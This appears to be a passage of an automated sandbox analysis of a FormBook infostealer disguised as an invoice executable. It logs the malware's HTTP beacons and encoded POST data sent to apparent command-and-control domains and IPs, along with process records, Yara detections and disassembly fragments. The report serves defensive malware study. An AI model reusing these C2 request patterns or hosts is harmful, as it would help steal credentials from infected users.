                                                                                                                                      Data Ascii: QbZ=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
                                                                                                                                      Apr 17, 2024 08:40:37.603390932 CEST360INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 17 Apr 2024 06:40:37 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 196
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      20192.168.2.449759178.211.137.59802680C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:40:41.121134996 CEST475OUTGET /aleu/?QbZ=N0v49flUUQfEWOo8G070d+LLia1Jclps7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sO7KdYvAVPIXxSY0kCkfcGUlYm8H/tBR+N9A=&PL=0TtPMJQHYL HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.skibinscy-finanse.pl
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Apr 17, 2024 08:40:41.347449064 CEST360INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 17 Apr 2024 06:40:41 GMT
                                                                                                                                      Server: Apache
                                                                                                                                      Content-Length: 196
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      21192.168.2.44976091.195.240.11780
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 17, 2024 08:40:47.145229101 CEST733OUTPOST /aleu/ HTTP/1.1
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Host: www.avoshield.com
                                                                                                                                      Origin: http://www.avoshield.com
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Content-Length: 200
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      Connection: close
                                                                                                                                      Referer: http://www.avoshield.com/aleu/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                      Data Raw: 51 62 5a 3d 31 73 4c 31 73 4e 59 6f 44 35 4d 30 35 55 57 50 48 69 59 36 2b 4b 6d 76 74 58 39 68 65 69 43 54 57 43 7a 64 48 74 6d 37 77 76 43 63 47 6c 41 70 2f 43 6c 56 5a 32 67 53 65 68 4a 68 35 39 36 67 52 50 2f 72 6d 62 46 63 46 47 66 72 6d 65 6b 6c 30 71 69 43 76 50 37 72 36 66 7a 5a 77 38 6c 2f 71 39 46 49 30 58 59 47 39 6c 73 35 4c 74 5a 66 37 31 53 74 52 36 38 75 70 39 69 70 54 70 72 76 57 70 2f 67 2b 6f 4c 30 74 72 46 67 73 77 77 64 41 6a 2b 44 43 39 5a 47 67 57 62 43 4a 4e 38 5a 31 33 67 43 68 69 37 52 34 44 71 33 58 2f 35 48 71 78 46 30 4a 37 79 34 4d 4c 30 66 6d 52 37 55 2b 77 3d 3d
                                                                                                                                      Data Ascii: QbZ=1sL1sNYoD5M05UWPHiY6+KmvtX9heiCTWCzdHtm7wvCcGlAp/ClVZ2gSehJh596gRP/rmbFcFGfrmekl0qiCvP7r6fzZw8l/q9FI0XYG9ls5LtZf71StR68up9ipTprvWp/g+oL0trFgswwdAj+DC9ZGgWbCJN8Z13gChi7R4Dq3X/5HqxF0J7y4ML0fmR7U+w==
                                                                                                                                      Apr 17, 2024 08:40:47.357666969 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                                      date: Wed, 17 Apr 2024 06:40:47 GMT
                                                                                                                                      content-type: text/html
                                                                                                                                      content-length: 556
                                                                                                                                      server: NginX
                                                                                                                                      connection: close
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

                                                                                                                                      Target ID:0
                                                                                                                                      Start time:08:38:34
                                                                                                                                      Start date:17/04/2024
                                                                                                                                      Path:C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
                                                                                                                                      Imagebase:0xef0000
                                                                                                                                      File size:734'216 bytes
                                                                                                                                      MD5 hash:96FE3D00E8B2BA36DFB240A004AB28E1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:1
                                                                                                                                      Start time:08:38:35
                                                                                                                                      Start date:17/04/2024
                                                                                                                                      Path:C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
                                                                                                                                      Imagebase:0x220000
                                                                                                                                      File size:734'216 bytes
                                                                                                                                      MD5 hash:96FE3D00E8B2BA36DFB240A004AB28E1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:08:38:35
                                                                                                                                      Start date:17/04/2024
                                                                                                                                      Path:C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
                                                                                                                                      Imagebase:0x550000
                                                                                                                                      File size:734'216 bytes
                                                                                                                                      MD5 hash:96FE3D00E8B2BA36DFB240A004AB28E1
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:08:38:54
                                                                                                                                      Start date:17/04/2024
                                                                                                                                      Path:C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe"
                                                                                                                                      Imagebase:0x120000
                                                                                                                                      File size:140'800 bytes
                                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:08:38:55
                                                                                                                                      Start date:17/04/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\replace.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\SysWOW64\replace.exe"
                                                                                                                                      Imagebase:0xf20000
                                                                                                                                      File size:18'944 bytes
                                                                                                                                      MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:08:39:09
                                                                                                                                      Start date:17/04/2024
                                                                                                                                      Path:C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe"
                                                                                                                                      Imagebase:0x7ff72bec0000
                                                                                                                                      File size:140'800 bytes
                                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:08:39:21
                                                                                                                                      Start date:17/04/2024
                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                      Imagebase:0x7ff6bf500000
                                                                                                                                      File size:676'768 bytes
                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Disassembly

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:6.6%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:19
                                                                                                                                        Total number of Limit Nodes:2
                                                                                                                                        execution_graph 12629 190fe80 12630 190fec2 12629->12630 12631 190fec8 GetModuleHandleW 12629->12631 12630->12631 12632 190fef5 12631->12632 12633 1904668 12634 190467a 12633->12634 12635 1904686 12634->12635 12637 1904778 12634->12637 12638 190479d 12637->12638 12642 1904888 12638->12642 12646 1904878 12638->12646 12644 19048af 12642->12644 12643 190498c 12643->12643 12644->12643 12650 19044b0 12644->12650 12648 1904888 12646->12648 12647 190498c 12647->12647 12648->12647 12649 19044b0 CreateActCtxA 12648->12649 12649->12647 12651 1905918 CreateActCtxA 12650->12651 12653 19059db 12651->12653

                                                                                                                                        Executed Functions

                                                                                                                                        Function 019044B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 316 19044b0-19059d9 CreateActCtxA 319 19059e2-1905a3c 316->319 320 19059db-19059e1 316->320 327 1905a4b-1905a4f 319->327 328 1905a3e-1905a41 319->328 320->319 329 1905a60 327->329 330 1905a51-1905a5d 327->330 328->327 331 1905a61 329->331 330->329 331->331
                                                                                                                                        APIs
                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 019059C9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1631198919.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_1900000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: 878c51c387c5a4c85f47670dbba3c3e4678fd8facf2581861f5fc256e70b2b63
                                                                                                                                        • Instruction ID: c1fd878954828245f98281a43023ee8dfa7ea8fd0bc6b8e85b5bb7e6fc35880f
                                                                                                                                        • Opcode Fuzzy Hash: 878c51c387c5a4c85f47670dbba3c3e4678fd8facf2581861f5fc256e70b2b63
                                                                                                                                        • Instruction Fuzzy Hash: D141EFB0C0071DCFEB25CFA9C884A8EBBF5BF49304F24806AD418AB251DB756985CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0190590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 333 190590c-1905913 334 190591c-19059d9 CreateActCtxA 333->334 336 19059e2-1905a3c 334->336 337 19059db-19059e1 334->337 344 1905a4b-1905a4f 336->344 345 1905a3e-1905a41 336->345 337->336 346 1905a60 344->346 347 1905a51-1905a5d 344->347 345->344 348 1905a61 346->348 347->346 348->348
                                                                                                                                        APIs
                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 019059C9
